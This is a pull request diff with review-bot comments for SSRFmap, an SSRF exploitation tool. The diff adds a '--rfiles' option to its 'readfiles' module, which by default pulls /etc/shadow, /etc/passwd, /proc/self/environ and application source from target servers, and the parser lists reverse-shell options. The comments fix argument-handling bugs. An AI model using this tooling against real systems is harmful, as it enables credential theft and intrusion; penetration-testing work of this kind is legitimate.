Merge pull request #35 from ScarletTeam/master
Allows readfiles module to read specific files specified in a parameter when starting the ssrfmap.py script
commit
c7922ba0ab
|
@ -1,6 +1,7 @@
|
||||||
from core.utils import *
|
from core.utils import *
|
||||||
import logging
|
import logging
|
||||||
import os
|
import os
|
||||||
|
from argparse import ArgumentParser
|
||||||
|
|
||||||
name = "readfiles"
|
name = "readfiles"
|
||||||
description = "Read files from the target"
|
description = "Read files from the target"
|
||||||
|
@ -8,12 +9,13 @@ author = "Swissky"
|
||||||
documentation = []
|
documentation = []
|
||||||
|
|
||||||
class exploit():
|
class exploit():
|
||||||
files = ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
|
|
||||||
|
|
||||||
def __init__(self, requester, args):
|
def __init__(self, requester, args):
|
||||||
logging.info("Module '{}' launched !".format(name))
|
logging.info("Module '{}' launched !".format(name))
|
||||||
|
self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
|
||||||
|
|
||||||
r = requester.do_request(args.param, "")
|
r = requester.do_request(args.param, "")
|
||||||
|
|
||||||
if r != None:
|
if r != None:
|
||||||
default = r.text
|
default = r.text
|
||||||
|
|
||||||
|
@ -36,3 +38,6 @@ class exploit():
|
||||||
logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
|
logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
|
||||||
with open(directory + "/" + filename, 'w') as f:
|
with open(directory + "/" + filename, 'w') as f:
|
||||||
f.write(diff)
|
f.write(diff)
|
||||||
|
|
||||||
|
else:
|
||||||
|
print("Empty response")
|
||||||
|
|
|
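Review bot: The new `self.files = args.targetfiles.split(',') if args.targetfiles != None else [...]` in `__init__` raises AttributeError when `--rfiles` is passed without a value, because the option is declared in parse_args with `nargs='?', const=True` and a bare flag therefore stores `True`, not a string. Guard on the type instead, e.g. `self.files = args.targetfiles.split(',') if isinstance(args.targetfiles, str) else self.files`, which also lets the class-level `files` list (it appears to be removed here and pasted inline) stay as the single copy of the defaults. `split(',')` keeps empty and whitespace-padded entries, so `[p.strip() for p in args.targetfiles.split(',') if p.strip()]` is the safer form. The added `from argparse import ArgumentParser` is not used in any line visible in this module and can be dropped. The body of `__init__` continues outside the hunks shown.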
@ -23,6 +23,7 @@ def parse_args():
|
||||||
python ssrfmap.py -r data/request.txt -p url -m redis
|
python ssrfmap.py -r data/request.txt -p url -m redis
|
||||||
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
||||||
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
||||||
|
python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles
|
||||||
'''
|
'''
|
||||||
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
|
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
|
||||||
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
|
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
|
||||||
|
@ -32,6 +33,7 @@ def parse_args():
|
||||||
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
|
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
|
||||||
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
|
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
|
||||||
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
|
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
|
||||||
|
parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)
|
||||||
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
||||||
parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True)
|
parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True)
|
||||||
parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)
|
parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)
|
||||||
|
|
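Review bot: The `--rfiles` help string and the new epilog example do not tell the user what value the option takes: the readfiles module splits it on commas, but the help says only "Files to read with readfiles module" and the example passes the flag with no value. Suggest `help="Comma-separated list of files to read with the readfiles module (default: built-in list)"` and an example line ending in `--rfiles FILE1,FILE2`. Since a bare flag has no meaning for this option, dropping `nargs='?', const=True` from the `add_argument` call would let argparse reject it with a usage error.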